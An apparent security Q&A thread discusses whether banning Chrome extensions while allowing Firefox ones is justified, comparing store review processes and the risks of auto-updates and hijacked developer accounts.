Are there objective reasons to not allow Google Chrome extensions, but to allow Firefox extensions?

I cannot answer the asked question, but I hope this could shed some light on your problem.

  • Should corporate security rules forbid usage of some browser extension?

    IMHO the answer is YES here. Browser extensions can virtually do almost anything on behalf of the regular browser. That means that a local firewall will not detect them.

  • Are there objective reasons to trust more XXX (put whatever browser of browser extension here) than YYY (another browser or browser extension).

    Well in IT security trust is based on 2 major pieces: audit of code and reputation. The former is objective, while the latter is not, but I must admit that I mainly use the latter because I have neither enough time nor enough knowledge to review everything, so I just rely on external advice from sources that I trust. When I rely on HTTPS to secure a channel, I must trust the certificate owner to not do bad things with the data once it has received it, and I trust the certificate signer. Long story short, it may be possible to say whether an extension has better reputation than another one, but it can only be by extension and not globally by browser.

  • Is usage of a portable Firefox in your use case an acceptable solution?

    Still my opinion, but unless you are in hierarchical place that allows you to ignore a rule from the security team, I want to say a big NO here. My advice is that you should first make a list of the extensions you commonly used, and possible replacement ones. Then you should try to gather as many elements on their objective security and on their reputation (still on a security point of view). Then you should tell your manager that the recent forbidding of Chrome extension leads to a net decrease in productivity, and ask him to propose the security team a list of extensions you need with possible replacements (Firefox for Chrome by example). Then either they agree with an acceptable list, or the question should climb higher in the organization hierarchy, until someone that is accountable for both the global security and the global productivity takes a decision. Silently ignoring corporate rules is always a bad decision because the guy that has global authority has no way to know that some rules are not followed.

And if your boss chooses that security is more important than productivity or the opposite, he has authority for that choice while you may not have.


I suspect that Anders is right, and whoever set up the Chrome extension ban just didn't think about Firefox. If they realized that you were using Firefox to get around the ban, they'd probably forbid that too (or try to, anyway).

FWIW, yes, browser extensions can be problematic from a security viewpoint, and I can see reasons for banning or heavily restricting them in some situations. That said, being able to install your own software, including a different browser, is just as problematic for the same reasons, or more so, so allowing that while banning extensions does seem inconsistent.

In any case, the real problem here seems to be the lack of communication. If the extension ban was based on an existing official policy, all employees should have been made aware of the policy; if not, such a policy should have been created and properly announced.


All that said, as the author of a Chrome / Firefox extension (SOUP), let me note that there is, or at least used to be, a real difference in the security review process between Chrome Web Store and Firefox Add-ons. Basically, the difference is that Firefox Add-ons used to have a mandatory manual security review process that all extensions had to pass before being approved, whereas Chrome Web Store only flags extensions for manual review if they fail an automated heuristic check.

Basically, my personal experience with submitting my extension to Firefox Add-ons and Chrome Web Store was more or less as follows:

  • Firefox Add-ons: I signed up for a developer account and submitted the extension. Two weeks later I received an e-mail saying that my extension (which, admittedly, had already grown quite large at that point) had been fully reviewed and approved. The reviewer had clearly gone over the code with a detailed eye, since they had spotted a nontrivial HTML sanitization bug (among just under 2,000 lines of pretty dense JavaScript) that could have led to an XSS vulnerability if, as they also noted in their review, the input hadn't come from a trusted source. Subsequent updates of the extension have generally been approved within a few days at most.

  • Chrome Web Store: To be able to submit an extension, I had to pay a $5 registration fee. This actually ended up taking me a while, since my bank was apparently flagging the charge as potentially fraudulent and refusing to let it through. Eventually I managed to sort it out by calling my bank and having them manually allow the charge. After completing the registration process, I submitted the extension and it was (IIRC) almost immediately published, apparently having passed the automated checks.

Of course, without knowing exactly what Google's automated checks are checking for, I cannot tell for sure how good they are at catching bugs and malware. But I do know that they failed to spot the almost-XSS bug in my own extension that Mozilla's reviewer caught.

More generally, my impression is that Google is more focused on trying to make extension authors traceable and accountable (via the registration fee, which at least means they know my credit card details; although I'm sure a malicious actor could find ways around that) and on detecting deliberate malware. And they don't always seem to catch it, either. The former Firefox Add-ons review process, on the other hand, not only kept out malware but also actually tried to spot potential security holes even in well-intentioned extensions. And by manually reviewing updates to existing extensions, the Firefox Add-ons system would also thwart developer account hijacking attacks like those that have compromised several legitimate Chrome extensions recently.


Unfortunately, as Makyen pointed out in the comments below, this difference no longer exists: as of a few months ago, Firefox Add-ons has moved to a semi-automated extension review process, just like the one Chrome Web Store is using.

In the linked blog post, the change has been motivated by "the new WebExtensions API [being] less likely to cause security or stability problems for users." Unfortunately, that reasoning does not really convince me: WebExtensions — even pure content script extensions like SOUP — can do plenty of damage in the hands of a malicious actor.

Just the content script API basically gives an extension free access to every web page you visit and every password or credit card number that you type in. Sure, when you install the extension, you'll be told about the sites it may run content scripts on — but so many extensions (including ad blockers, privacy extensions, etc.) already require the ability to inject scripts on every site that few users will pay any attention to that warning, even if they understand what it means.

Just a week after the announcement linked above, two extensions with embedded bitcoin miners were already spotted on Firefox Add-ons. So it seems that, when it comes to extensions, the former security advantage of Firefox over Chrome is now just nostalgia. :(


Yes.

There can be a legitimate reason:

  • Chrome extensions are always automatically updated.
  • Firefox extensions are not required to be auto-updated.

This means that if the account of the developer of any Chrome extension with "read your information on all websites" permission gets compromised, the thief can push out malicious code around the world very quickly1—and all sorts of accounts, from emails to bank accounts, would be at risk. Allowing the user to update at a slower and less-predictable pace makes it (1) more likely that by the time the update is done, the malicious code will have been spotted and removed, and also (2) that the attack itself would be less likely to be attempted due to the caveat in (1).

Now, I have no idea if this is your company's reason. In my experience, people (and even Google) seem to forget about this threat and/or brush this threat of developer compromise under the rug (and in my opinion, dangerously incorrectly so). However, it is a legitimate concern, and I believe it is only a matter of time before dangerous malware spreads globally via forced auto-update.

1Don't be too naive in how you think about this. If you're thinking "but they run automated tests" or "but they stagger the updates" or [whatever], realize that malicious code need not show signs of malicious activity immediately, especially not network activity. It can simply lie dormant while the update is being pushed out, then set to activate sometime later, and after the simultaneous global activation, it can send credentials from a ton of users and websites back to its mother ship before it is caught and disabled.